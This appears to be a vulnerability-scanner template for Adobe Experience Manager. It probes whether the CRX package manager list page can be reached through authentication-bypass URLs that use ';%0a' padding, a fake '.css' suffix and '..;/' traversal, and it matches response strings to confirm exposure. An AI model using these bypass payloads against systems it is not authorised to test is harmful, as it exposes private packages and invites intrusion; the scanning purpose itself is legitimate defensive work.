id: aem-crx-list-packages
info:
  name: AEM CRX List All Packages
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "buildCount") && StringSearch("body", "downloadName") && StringSearch("body", "acHandling")

  - method: GET
    redirect: false
    url: >-
     {{.root}}/content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "buildCount") && StringSearch("body", "downloadName") && StringSearch("body", "acHandling")

references:
  - link: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
  - author: '0xd0ff9 & j3ssie'